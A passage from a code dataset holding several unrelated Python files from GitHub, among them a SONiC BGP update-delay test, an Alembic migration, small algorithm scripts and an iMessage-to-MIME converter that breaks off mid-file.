dll.kvaDbAddNodeAttribute(self._handle, attrib_def._handle, ct.byref(ah))\r\n # Set the value in the node attribute\r\n attribute = Attribute(self._db, ah)\r\n attribute.value = value\r\n\r\n @property\r\n def comment(self):\r\n \"\"\"`str`: The node's comment\"\"\"\r\n buf = ct.create_string_buffer(255)\r\n dll.kvaDbGetNodeComment(self._handle, buf, ct.sizeof(buf))\r\n return buf.value.decode('utf-8')\r\n\r\n @comment.setter\r\n def comment(self, value):\r\n dll.kvaDbSetNodeComment(self._handle, value.encode('utf-8'))\r\n\r\n @property\r\n def name(self):\r\n \"\"\"`str`: The node's name\"\"\"\r\n buf = ct.create_string_buffer(255)\r\n dll.kvaDbGetNodeName(self._handle, buf, ct.sizeof(buf))\r\n return buf.value.decode('utf-8')\r\n\r\n @name.setter\r\n def name(self, value):\r\n dll.kvaDbSetNodeName(self._handle, value.encode('utf-8'))\r\n","repo_name":"Kvaser/pycanlib","sub_path":"canlib/kvadblib/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"51"} +{"seq_id":"22771929877","text":"tries = int(input())\r\nt = 0\r\nwhile t < tries: \r\n answer = input()\r\n x = answer.split('X')\r\n os = 0\r\n for i in range(len(x)):\r\n os += (len(x[i])*(len(x[i])+1))//2\r\n i+=1\r\n print(os)\r\n t += 1","repo_name":"Conni2/Baekjoon","sub_path":"백준/Bronze/8958. OX퀴즈/OX퀴즈.py","file_name":"OX퀴즈.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17139812400","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom uuid import uuid4\n\nimport pytest\nfrom click.testing import CliRunner\n\nfrom monz.command_line import cli\n\n\n# Module fixtures\n@pytest.fixture(scope='module')\ndef runner():\n \"\"\"Get CliRunner\"\"\"\n return CliRunner()\n\n\n# Tests\ndef test_incorrect_access_token(runner):\n \"\"\"Test invoking the script with incorrect access token\"\"\"\n result = runner.invoke(\n cli, args=['--access-token', str(uuid4()), 'info']\n )\n\n assert isinstance(result.exception, SystemExit)\n assert result.exit_code == 1\n\n\ndef test_info(runner):\n \"\"\"\n Test invoking the script 'info' subcommand, which should also be the\n default subcomand\n \"\"\"\n result = runner.invoke(\n cli, args=['info'],\n )\n\n assert result.exit_code == 0\n assert result.output\n assert result.output.startswith('Balance: ')\n assert result.output.count('\\n') >= 6\n\n # Running the script with no arguments should have the same effect\n result_no_args = runner.invoke(cli)\n\n assert result.exit_code == result_no_args.exit_code\n assert result.output == result_no_args.output\n\n\ndef test_accounts(runner):\n \"\"\"Test invoking the script 'accounts' subcommand\"\"\"\n result = runner.invoke(\n cli, args=['accounts'],\n )\n\n assert result.exit_code == 0\n assert result.output\n assert result.output.startswith('Account #')\n assert result.output.count('\\n') >= 3\n\n\ndef test_balance(runner):\n \"\"\"Test invoking the script 'balance' subcommand\"\"\"\n result = runner.invoke(\n cli, args=['balance'],\n )\n\n assert result.exit_code == 0\n assert result.output\n assert result.output.startswith('Balance:')\n\n\ndef test_transactions(runner):\n \"\"\"Test invoking the script 'transactions' subcommand\"\"\"\n for n in [1, 5, 10]:\n result = runner.invoke(\n cli, args=['transactions', '-n', str(n)],\n )\n\n assert result.exit_code == 0\n assert result.output\n # Each item takes 3 lines 
plus a blank one, no new line at the end\n assert result.output.count('\\n') == (n*4 - 1)\n","repo_name":"pawelad/monz","sub_path":"monz/test/test_command_line.py","file_name":"test_command_line.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"43898547044","text":"\"\"\"empty message\n\nRevision ID: 38d17971ab3b\nRevises: ddf3072ef4bd\nCreate Date: 2018-04-24 17:17:35.902475\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '38d17971ab3b'\ndown_revision = 'ddf3072ef4bd'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(u'follows_userID_fkey', 'follows', type_='foreignkey')\n op.drop_constraint(u'follows_followerID_fkey', 'follows', type_='foreignkey')\n op.drop_constraint(u'likes_userID_fkey', 'likes', type_='foreignkey')\n op.drop_constraint(u'likes_postID_fkey', 'likes', type_='foreignkey')\n op.drop_constraint(u'posts_userID_fkey', 'posts', type_='foreignkey')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_foreign_key(u'posts_userID_fkey', 'posts', 'users', ['userID'], ['id'])\n op.create_foreign_key(u'likes_postID_fkey', 'likes', 'posts', ['postID'], ['id'])\n op.create_foreign_key(u'likes_userID_fkey', 'likes', 'users', ['userID'], ['id'])\n op.create_foreign_key(u'follows_followerID_fkey', 'follows', 'users', ['followerID'], ['id'])\n op.create_foreign_key(u'follows_userID_fkey', 'follows', 'users', ['userID'], ['id'])\n # ### end Alembic commands ###\n","repo_name":"omarchristie/info3180-project2","sub_path":"migrations/versions/38d17971ab3b_.py","file_name":"38d17971ab3b_.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41310721320","text":"#!/usr/bin/env python3\n# coding: utf-8\n\n\nimport re\nfrom pprint import pprint\nimport sys\n\ndef sprint_dot(fa):\n\n ret = ''\n\n ret += '''digraph G {\n graph [charset=\"UTF-8\"];\n rankdir=LR;\n'''\n \n ret += ' label=\"{title}\";\\n'.format(\n title=fa[\"title\"])\n \n ret += \"\\n\";\n \n def str_arrow(arrow):\n str_edge = \" {node1:<8} -> {node2:<8}\".format(\n node1=arrow[\"node1\"], node2=arrow[\"node2\"])\n \n if arrow[\"edge\"]:\n str_atr = ' [label=\"{edge}\"];'.format(\n edge=arrow[\"edge\"]) if arrow[\"edge\"] else \"\"\n return str_edge + str_atr\n \n return str_edge\n \n ret += \"\\n\".join(( str_arrow(arrow) for arrow in fa[\"arrows\"] ))\n \n ret += \"\\n\";\n \n for node in fa[\"final_nodes\"]:\n ret += ' {node:<8} [shape=doublecircle rank=max];\\n'.format(node=node)\n \n ret += ' {node:<8} [shape=none rank=max];\\n'.format(node='start')\n\n ret += \"}\\n\"\n\n return ret\n\ndef get_node(txt):\n _match = re.compile('^([\\w]+)\\[F\\]$').search(txt)\n if _match:\n name = _match.group(1)\n is_final = True\n else:\n name = txt\n is_final = False\n \n return {\n \"name\": name,\n \"is_final\": is_final,\n }\n \nif __name__ == '__main__':\n if len(sys.argv) > 1:\n in_file = sys.argv[1]\n else:\n in_file = './sample/sample_fa.txt'\n \n re_title = re.compile('^\\s*title\\s*:\\s*(\\S(?:.*\\S)?)$')\n re_node_edge = re.compile('''\n ^\\s*\n ([\\w\\[\\]]+) # node1\n \\s*\n -(?:([\\w,\\[\\]]+)-|)> # edge\n ( # remain\n \\s*\n ([\\w\\[\\]]+) # node2\n (?:\n \\s*\n 
-(?:[\\w+,\\[\\]]-|)>\n                \\s*\n                (?:[\\w\\[\\]]+)\n            )*\n        )\n        \\s*$\n        ''', re.VERBOSE)\n    \n    fa = {\n        \"title\":'',\n        \"arrows\":[],\n        \"final_nodes\":[]\n    }\n\n    with open(in_file, 'r') as f:\n        for line in ( l.rstrip() for l in f):\n            if re.compile('^\\s*#').search(line):\n                continue\n            \n            if re.compile('^\\s*$').search(line):\n                continue\n\n            _match = re_title.search(line)\n            if _match:\n                fa[\"title\"] = _match.group(1)\n                continue\n            \n            _line = line\n            _match = re_node_edge.search(_line)\n            if _match:\n                while _match:\n                    node1 = get_node(_match.group(1))\n                    edge = _match.group(2)\n                    node2 = get_node(_match.group(4))\n                    _line = _match.group(3)\n                    fa[\"arrows\"].append({\n                        \"node1\" : node1[\"name\"],\n                        \"edge\" : edge,\n                        \"node2\" : node2[\"name\"],\n                    })\n                    \n                    for node in ( node for node in ( node1, node2 ) if node[\"is_final\"]):\n                        fa[\"final_nodes\"].append(node[\"name\"])\n                    \n                    _match = re_node_edge.search(_line)\n                \n                continue\n    print(sprint_dot(fa))\n\n\n","repo_name":"megmeg1974/fa_graphviz","sub_path":"fa.py","file_name":"fa.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"41467257723","text":"import json\n\nfile_in = \"50K_corr.txt\" # rows of the form p_id<TAB>artist<TAB>title\nfile_out = \"50K_better.txt\"\n\n\n# if a playlist has at least 5 songs, write it to the new file,\n# stripping (, [ and / from the titles, since they normally don't appear in tags\n\n\ndef better_title(title):\n\n    if (title.find(\"(\") != -1):\n        title = title.split(\"(\")[0]\n\n    if (title.find(\"[\") != -1):\n        title = title.split(\"[\")[0]\n\n    if (title.find(\"/\") != -1):\n        title = title.split(\"/\")[0]\n\n\n    return title\n\n\n\n\nf = open(file_in, 'r')\nf_out = open(file_out, 'w')\n\np_id_old = \"\"\ncnt = 0\nlines = []\n\n\nfor line in f:\n    tab_sep = line.split('\\t')\n    p_id = tab_sep[0]\n    #artist = tab_sep[1]\n    #title = tab_sep[2].split('\\n')[0]\n\n    if (p_id == p_id_old): # same playlist: just keep accumulating\n        cnt += 1\n        lines.append(line)\n\n    else: # playlist changed: count what accumulated, fix up the lines and write them out\n\n        if (cnt > 4):\n            for track in lines:\n                t_sep = track.split('\\t')\n                t_p_id = t_sep[0]\n                artist = t_sep[1]\n                artist = artist.replace(\"/\", \"\")\n                title = t_sep[2].split('\\n')[0]\n                title = better_title(title)\n                new_line = p_id + \"\\t\" + artist + \"\\t\" + title\n\n                f_out.write(new_line)\n                f_out.write(\"\\n\")\n\n        cnt = 0\n        p_id_old = p_id\n        lines = []","repo_name":"cscenter/automatic-playlist-generation","sub_path":"DataSetCreator/set_process.py","file_name":"set_process.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"ru","doc_type":"code","stars":5,"dataset":"github-code","pt":"51"}
+{"seq_id":"1899243534","text":"# Insertion sort is stable and in-place.\n# Its complexity is O(n^2) in the worst case and O(n) in the best case.\n\nimport random\n\ndef insertion_sort(my_list):\n    \"\"\" Sort a list using the insertion sort \"\"\"\n    \n    # Start at the second element (pos 1).\n    # Use this element to insert into the list.\n    for key_pos in range(1, len(my_list)):\n        \n        # Get the value of the element to insert\n        key_value = my_list[key_pos]\n        \n        # Scan from right to the left (start of list)\n        scan_pos = key_pos - 1\n        \n        # Loop each element, moving them up until\n        # we reach the position the key belongs in\n        while (scan_pos >= 0) and (my_list[scan_pos] > key_value):\n            my_list[scan_pos + 1] = my_list[scan_pos]\n            scan_pos = scan_pos - 1\n        \n        # Everything's been moved out of the way, insert\n        # the key into the correct location\n        my_list[scan_pos + 
1] = key_value\n \n\ndef print_list(my_list):\n for item in my_list:\n print(\"{:3}\".format(item), end = \"\")\n print()\n \n# Testing --------------------------------------------------------------------\ndef main():\n my_list = []\n for i in range(10):\n my_list.append(random.randrange(100))\n \n # Try out the sort\n print_list(my_list)\n insertion_sort(my_list)\n print_list(my_list)\n\nif __name__ == '__main__':\n main()","repo_name":"LarsIndus/algorithms-DS","sub_path":"sorting/insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3909838264","text":"import contextlib\nimport ipaddress\nimport logging\nimport pytest\nimport tempfile\nimport time\n\nfrom datetime import datetime\n\nfrom scapy.all import IP\nfrom scapy.all import IPv6\nfrom scapy.all import sniff\nfrom scapy.contrib import bgp\n\nfrom tests.common.helpers.assertions import pytest_assert\nfrom tests.common.utilities import wait_until\n\n\npytestmark = [\n pytest.mark.topology(\"dualtor\")\n]\nBGP_LOG_TMPL = \"/tmp/bgp_neighbor_%s.pcap\"\n\n\n@contextlib.contextmanager\ndef log_bgp_updates(duthost, iface, save_path):\n \"\"\"Capture bgp packets to file.\"\"\"\n if iface == \"any\":\n # Scapy doesn't support LINUX_SLL2 (Linux cooked v2), and tcpdump on Bullseye\n # defaults to writing in that format when listening on any interface. Therefore,\n # have it use LINUX_SLL (Linux cooked) instead.\n start_pcap = \"tcpdump -y LINUX_SLL -i %s -w %s port 179\" % (iface, save_path)\n else:\n start_pcap = \"tcpdump -i %s -w %s port 179\" % (iface, save_path)\n # for multi-asic dut, add 'ip netns exec asicx' to the beggining of tcpdump cmd\n stop_pcap = \"sudo pkill -SIGINT -f '%s'\" % start_pcap\n start_pcap = \"nohup {} &\".format(start_pcap)\n duthost.shell(start_pcap)\n try:\n yield\n finally:\n duthost.shell(stop_pcap, module_ignore_errors=True)\n\n\n@pytest.fixture(params=[\"ipv4\", \"ipv6\"])\ndef ip_version(request):\n return request.param\n\n\n@pytest.fixture\ndef select_bgp_neighbor(ip_version, duthost):\n config_facts = duthost.get_running_config_facts()\n\n for bgp_neighbor, neighbor_details in list(config_facts[\"BGP_NEIGHBOR\"].items()):\n bgp_neighbor_addr = ipaddress.ip_address(bgp_neighbor)\n is_ipv4_neighbor = isinstance(bgp_neighbor_addr, ipaddress.IPv4Address)\n if ip_version == \"ipv4\" and is_ipv4_neighbor:\n break\n elif ip_version == \"ipv6\" and not is_ipv4_neighbor:\n break\n else:\n raise ValueError(\"Failed to find\")\n\n return bgp_neighbor, neighbor_details\n\n\n@pytest.fixture(autouse=True)\ndef restore_bgp_sessions(duthost):\n yield\n\n duthost.shell(\"config bgp startup all\")\n\n\ndef test_dualtor_bgp_update_delay(duthost, ip_version, select_bgp_neighbor):\n \"\"\"\n This testcase aims to validate that, for a dualtor T0, after startup BGP sessions,\n it should always sleep for 10 seconds delay before sending out any BGP updates.\n And the BGP updates come from T1s should comes earlier than the BGP update to the T1s,\n so the T0 could always have default route ready before T1 learns any route from T0.\n \"\"\"\n\n def verify_bgp_session(duthost, bgp_neighbor, admin, state):\n bgp_facts = duthost.bgp_facts()[\"ansible_facts\"][\"bgp_neighbors\"]\n return bgp_neighbor in bgp_facts and bgp_facts[bgp_neighbor][\"admin\"] == admin \\\n and bgp_facts[bgp_neighbor][\"state\"] == state\n\n def bgp_update_packets(pcap_file):\n \"\"\"Get bgp update packets from pcap 
file.\"\"\"\n packets = sniff(\n offline=pcap_file,\n lfilter=lambda p: ip_packet in p and bgp.BGPHeader in p and p[bgp.BGPHeader].type == 2\n )\n return packets\n\n bgp_neighbor, bgp_details = select_bgp_neighbor\n local_address = bgp_details[\"local_addr\"]\n ip_packet = IP if ip_version == \"ipv4\" else IPv6\n\n logging.info(\"shutdown BGP %s\", bgp_neighbor)\n duthost.shell(\"config bgp shutdown neighbor %s\" % bgp_neighbor)\n pytest_assert(\n wait_until(10, 2, 2, verify_bgp_session, duthost, bgp_neighbor, \"down\", \"idle\"),\n \"Could not shutdown neighbor %s\" % bgp_neighbor\n )\n\n logging.info(\"startup BGP %s\", bgp_neighbor)\n bgp_pcap = BGP_LOG_TMPL % bgp_neighbor\n with log_bgp_updates(duthost, \"any\", bgp_pcap):\n startup_ret = duthost.shell(\"config bgp startup neighbor %s\" % bgp_neighbor)\n pytest_assert(\n wait_until(10, 2, 2, verify_bgp_session, duthost, bgp_neighbor, \"up\", \"established\"),\n \"Could not startup neighbor %s\" % bgp_neighbor\n )\n\n time.sleep(20)\n\n bgp_startup_time = datetime.strptime(startup_ret['end'], \"%Y-%m-%d %H:%M:%S.%f\")\n logging.debug(\"BGP neighbor is started at %s\", bgp_startup_time)\n\n with tempfile.NamedTemporaryFile() as tmp_pcap:\n duthost.fetch(src=bgp_pcap, dest=tmp_pcap.name, flat=True)\n duthost.file(path=bgp_pcap, state=\"absent\")\n bgp_updates = bgp_update_packets(tmp_pcap.name)\n\n first_update_to_peer = None\n first_update_from_peer = None\n for bgp_update in bgp_updates:\n if bgp_update[ip_packet].src == bgp_neighbor and bgp_update[ip_packet].dst == local_address:\n # update from peer\n if first_update_from_peer is None:\n first_update_from_peer = bgp_update\n elif bgp_update[ip_packet].src == local_address and bgp_update[ip_packet].dst == bgp_neighbor:\n # update to peer\n if first_update_to_peer is None:\n first_update_to_peer = bgp_update\n\n pytest_assert(\n first_update_from_peer is not None,\n \"Could not find any BGP updates from %s\" % bgp_neighbor\n )\n pytest_assert(\n first_update_to_peer is not None,\n \"Could not find any BGP updates to %s\" % bgp_neighbor\n )\n\n first_update_to_peer_time = datetime.fromtimestamp(first_update_to_peer.time)\n first_update_from_peer_time = datetime.fromtimestamp(first_update_from_peer.time)\n pytest_assert(\n (first_update_to_peer_time - bgp_startup_time).total_seconds() >= 10,\n \"There should be at least 10 seconds of delay between startup BGP session and the first out BGP update\"\n )\n pytest_assert(\n first_update_to_peer_time > first_update_from_peer_time,\n \"Dualtor T0 should receive BGP update from peer first\"\n )\n","repo_name":"sonic-net/sonic-mgmt","sub_path":"tests/dualtor_mgmt/test_dualtor_bgp_update_delay.py","file_name":"test_dualtor_bgp_update_delay.py","file_ext":"py","file_size_in_byte":5743,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"51"} +{"seq_id":"32646476026","text":"from django.db import models\nfrom django.core.validators import MinLengthValidator\nfrom .validators import check_name_only_letters\n\n# Create your models here.\nclass Fruit(models.Model):\n\n name = models.CharField(\n max_length=30,\n validators=[MinLengthValidator(2), check_name_only_letters],\n blank=False,\n null=False\n )\n\n image = models.URLField(\n blank=False,\n null=False\n )\n\n description = models.TextField(\n blank=False,\n null=False\n )\n\n nutrition = models.TextField(\n blank=True,\n null=True\n 
)\n","repo_name":"BorislavRaynov/Fruitipedia","sub_path":"fruitipedia/fruit/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"4826383052","text":"import sys\nfrom time import perf_counter\n\n#recursive weight_on function for the human pyramid\ndef weight_on(r,c): \n #count the number of times the function is called\n weight_on.counter += 1\n #if the row and column is 0, means the top position, return 0\n if r == 0 and c == 0:\n return 0\n #if the column is 0, means the left position, return the weight on the back of the person in row r-1 and and column c\n elif c == 0:\n return (weight_on(r-1,0) +200)/2.0\n #if the column is r, means the right position, return the weight on the back of the person in row r-1 and and column c-1\n elif c == r:\n return (weight_on(r-1,c-1) +200)/2.0\n #if the column is neither 0 nor r, means the middle position, return the sum of weight on the back of the person in row r-1 and and column c-1 and the weight on the back of the person in row r-1 and and column c\n else:\n return (weight_on(r-1,c-1) +200)/2.0 + (weight_on(r-1,c) +200)/2.0\n#print the number of function calls\nweight_on.counter = 0\n\ndef main():\n #get the number of rows\n rows = int(input(\"Enter the number of rows: \"))\n #start the timer\n start_time = perf_counter()\n #save and write the output to a file named part2.out\n sys.stdout = open(\"part2.out\", \"w\")\n #loop through the rows \n for r in range(0, rows):\n #loop through the columns\n for c in range(0, r+1):\n #print the weight\n print(\"{:5.1f}\".format(weight_on(r,c)), end=\" \")\n #print a new line\n print()\n #end the timer\n end_time = perf_counter()\n #calculate the time\n elapsed_time = end_time - start_time\n print(\"Elapsed time: {:.3f} seconds\".format(elapsed_time))\n print(\"Number of function calls: {}\".format(weight_on.counter))\n #close the file\n sys.stdout.close()\n\nif __name__ == \"__main__\":\n main()","repo_name":"dwk601/CS-1410","sub_path":"Human Pyramid/pyramid_rec.py","file_name":"pyramid_rec.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71342600160","text":"#!/usr/bin/env python\n\n\"\"\"The setup script.\"\"\"\n\nfrom setuptools import setup, find_packages\n\nwith open('README.rst') as readme_file:\n readme = readme_file.read()\n\nwith open('HISTORY.rst') as history_file:\n history = history_file.read()\n\nrequirements = [ ]\n\nsetup_requirements = [ ]\n\ntest_requirements = [ ]\n\nsetup(\n author=\"Chandrasekhar Ramakrishnan\",\n author_email='cramakrishnan@gmail.com',\n python_requires='>=3.6',\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n ],\n description=\"Utility functions for the intro to data viz notebooks.\",\n install_requires=requirements,\n license=\"BSD license\",\n long_description=readme + '\\n\\n' + history,\n include_package_data=True,\n keywords='introviz',\n name='introviz',\n packages=find_packages(include=['introviz', 'introviz.*']),\n setup_requires=setup_requirements,\n test_suite='tests',\n tests_require=test_requirements,\n 
url='https://github.com/ciyer/introviz',\n version='0.1.0',\n zip_safe=False,\n)\n","repo_name":"ciyer/intro-data-viz","sub_path":"src/python/introviz/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"51"} +{"seq_id":"18407665811","text":"# import cv2\n# import numpy as np\n#\n# img = cv2.imread('image/cross4.jpg')\n# gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n# edges = cv2.Canny(gray,50,220)\n#\n# lines = cv2.HoughLines(edges,1,np.pi/180,200)\n#\n# print(lines)\n#\n# # for rho,theta in lines[2]:\n# for line in lines:\n# for rho, theta in line:\n# print(rho, theta)\n# a = np.cos(theta)\n# b = np.sin(theta)\n# x0 = a*rho\n# y0 = b*rho\n# x1 = int(x0 + 1000*(-b))\n# y1 = int(y0 + 1000*(a))\n# x2 = int(x0 - 1000*(-b))\n# y2 = int(y0 - 1000*(a))\n#\n# print(x1,y1,x2,y2)\n# cv2.line(img,(x1,y1),(x2,y2),(0,0,255),2)\n# #\n# cv2.imshow('out', img)\n# cv2.waitKey()\n#\n\nimport numpy as np\nimport cv2 as cv\nfrom matplotlib import pyplot as plt\nimg = cv.imread('image/cross4.jpg')\ngray = cv.cvtColor(img,cv.COLOR_BGR2GRAY)\ncorners = cv.goodFeaturesToTrack(gray,25,0.01,10)\ncorners = np.int0(corners)\nl = np.array([])\nfor j, i in enumerate(corners):\n x,y = i.ravel()\n cv.circle(img,(x,y),3,255,-1)\n cv.putText(img, f\"{j}\", (x,y), cv.FONT_HERSHEY_SIMPLEX, .4, 255)\nplt.imshow(img),plt.show()\nprint(l)","repo_name":"Wanchatpookhuntod/checkExam","sub_path":"line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"6268247386","text":"# imessage_to_mime.py - Convert imessage dictionary to MIME\n#\n# Stephen Fegan - sfegan@gmail.com - 2017-02-28\n#\n# This program is motivated by the author's experience of SMSBackup+ under\n# Android, an excellent application to backup SMS/MMS messages to GMail where\n# they can be searched etc. This little program tries to do the same thing for\n# messages / conversations stored in the iMessage database.\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. 
If not, see <http://www.gnu.org/licenses/>.\n\nimport email.mime.base\nimport email.mime.text\nimport email.mime.image\nimport email.mime.audio\nimport email.mime.multipart\nimport email.utils\nimport email.encoders\nimport email.charset\nimport email.header\nimport email\nimport hashlib\nimport copy\n#import BytesIO\n\nemail.charset.Charset('utf-8').body_encoding = email.charset.QP\nemail.charset.Charset('utf-8').header_encoding = email.charset.QP\n\nXheader_base = 'X-imessagesync-'\ndef Xheader(ext): return Xheader_base + ext\nXheader_guid = Xheader('guid')\nmessage_id_fqdn = '@imessage_sync.local'\n\ndef get_handle_name(handle, addressbook):\n    name = addressbook.lookup_name(handle)\n    if(name is None):\n        name = handle['contact']\n    return name\n\ndef get_chat_contacts(chat):\n    return ','.join(map(lambda h: h['contact'], chat['handles']))\n\ndef get_chat_names(chat, addressbook):\n    names = sorted(map(lambda h: get_handle_name(h, addressbook), chat['handles']))\n    if(len(names) > 1):\n        s = ', '.join(names[0:-1])\n        s += ' and ' + names[-1]\n        return s\n    else:\n        return names[0]\n\ndef get_subject(message, addressbook):\n    return 'Chat with ' + get_chat_names(message['chat'], addressbook)\n\ndef make_email_header(all_emails):\n    h = email.header.Header()\n    if(type(all_emails[0]) is not list):\n        all_emails = [ all_emails ]\n    first = True\n    for one_email in all_emails:\n        if(not first):\n            h.append(', ')\n        first = False\n        h.append(one_email[0])\n        h.append('<' + one_email[1] + '>')\n    return h\n\ndef get_from(message, addressbook):\n    if(message['is_from_me']):\n        return make_email_header(addressbook.me())\n    elif(not message['handle'] is None):\n        return make_email_header(addressbook.lookup_email(message['handle']))\n    elif(not message['other_handle'] is None):\n        return make_email_header(addressbook.lookup_email(message['other_handle']))\n    else:\n        return make_email_header(['Unknown person', 'unknown@unknown.email'])\n    pass\n\ndef get_to(message, addressbook):\n    th = []\n    if(message['is_from_me']):\n        th = list(map(addressbook.lookup_email, message['chat']['handles']))\n    else:\n        fh = None\n        if(not message['handle'] is None):\n            fh = message['handle']\n        elif(not message['other_handle'] is None):\n            fh = message['other_handle']\n        th = [ addressbook.me() ]\n        if(message['chat'] and message['chat']['handles']):\n            for to in map(addressbook.lookup_email,\n                filter(lambda h: h != fh, message['chat']['handles'])):\n                th.append(to)\n    return make_email_header(th)\n\ndef get_rfc3501_id(id):\n    return '<'+id+message_id_fqdn+'>'\n\ndef get_message_id(message):\n    return get_rfc3501_id(message['guid'])\n\ndef get_chat_id(chat, addressbook):\n    id = hashlib.sha1(get_chat_names(chat, addressbook).encode()).hexdigest()\n    return get_rfc3501_id(id)\n\ndef get_text_msg(message):\n    text = message['text']\n    try:\n        text.encode('us-ascii')\n    except:\n        msg = email.mime.text.MIMEText('', _charset='utf-8')\n        msg.replace_header('content-transfer-encoding', 'quoted-printable')\n        msg.set_payload(text, 'utf-8')\n        return msg\n    return email.mime.text.MIMEText(text, _charset='us-ascii')\n\ndef get_attachment_msg(attachment):\n    if(not attachment['mime_type']):\n        return None\n    path = attachment['filename']\n    maintype, subtype = attachment['mime_type'].split('/')\n    fp = None\n    if(path):\n        try:\n            fp = open(path, 'r' if maintype=='text' else 'rb')\n        except:\n            fp = None\n    if(fp is None):\n        return email.mime.text.MIMEText('Attachment \"%s\" not found on server'%\n            attachment['raw_filename'])\n    if maintype == 'text':\n        # Note: we should handle calculating the charset\n        msg = 
email.mime.text.MIMEText(fp.read(), _subtype=subtype)\n fp.close()\n elif maintype == 'image':\n msg = email.mime.image.MIMEImage(fp.read(), _subtype=subtype)\n fp.close()\n elif maintype == 'audio':\n msg = email.mime.audio.MIMEAudio(fp.read(), _subtype=subtype)\n fp.close()\n else:\n msg = email.mime.base.MIMEBase(maintype, subtype)\n msg.set_payload(fp.read())\n fp.close()\n # Encode the payload using Base64\n email.encoders.encode_base64(msg)\n if(attachment.get('transfer_name') and attachment.get('created_date')):\n msg.add_header('Content-Disposition', 'attachment',\n creation_date=email.utils.formatdate(attachment['created_date']),\n filename=attachment['transfer_name'])\n elif(attachment.get('transfer_name')):\n msg.add_header('Content-Disposition', 'attachment',\n filename=attachment['transfer_name'])\n elif(attachment.get('created_date')):\n msg.add_header('Content-Disposition', 'attachment',\n creation_date=email.utils.formatdate(attachment['created_date']))\n return msg\n\ndef is_valid(message):\n return (message.get('chat') is not None and \\\n len(message['chat']['handles'])>0 and \\\n (message['is_from_me']==True or message.get('handle') is not None or message.get('other_handle') is not None) and \\\n (message['text'] is not None or len(message['attachments'])>0))\n\ndef set_headers(outer, message, addressbook, in_reply_to, sync_time=None):\n outer['Subject'] = email.header.Header(get_subject(message, addressbook))\n outer['To'] = get_to(message, addressbook)\n outer['From'] = get_from(message, addressbook)\n outer['Date'] = email.utils.formatdate(message['date'])\n outer['Message-ID'] = get_message_id(message)\n chat_id = get_chat_id(message['chat'], addressbook)\n if(chat_id in in_reply_to):\n outer['In-Reply-To'] = in_reply_to[chat_id]\n outer['References'] = chat_id + ' ' + in_reply_to[chat_id]\n else:\n outer['References'] = chat_id\n outer[Xheader_guid] = message['guid']\n #outer[Xheader('chat-guid')] = message['chat']['guid']\n outer[Xheader('contacts')] = \\\n ' '.join(map(lambda h: h['contact'], message['chat']['handles']))\n outer[Xheader('my-contact')] = \\\n message['chat']['last_addressed_handle']\n outer[Xheader('service')] = message['service']\n if(message.get('account') and message['account'] != 'e:'):\n outer[Xheader('account')] = message['account']\n if(message['date_delivered'] and message['is_delivered']):\n outer[Xheader('date-delivered')] = \\\n email.utils.formatdate(message['date_delivered'])\n if(message['date_read'] and message['is_read']):\n outer[Xheader('date-read')] = \\\n email.utils.formatdate(message['date_read'])\n if(not message['is_from_me'] and message['handle']):\n outer[Xheader('from-contact')] = message['handle']['contact']\n# outer[Xheader('handle-country')] = message['handle']['country']\n# outer[Xheader('handle-service')] = message['handle']['service']\n if(sync_time):\n outer[Xheader('upload-date')] = \\\n email.utils.formatdate(sync_time)\n\ndef get_email(message, addressbook, in_reply_to = dict(), max_attachment_size = None, sync_time = None):\n if(message['attachments']):\n emails = []\n outer = email.mime.multipart.MIMEMultipart()\n set_headers(outer, message, addressbook, in_reply_to, sync_time)\n outer.preamble = 'You will not see this in a MIME-aware email reader.\\n'\n outer.attach(get_text_msg(message))\n attachments = []\n for a in message['attachments']:\n attachments.append(get_attachment_msg(a))\n if(max_attachment_size is not None and 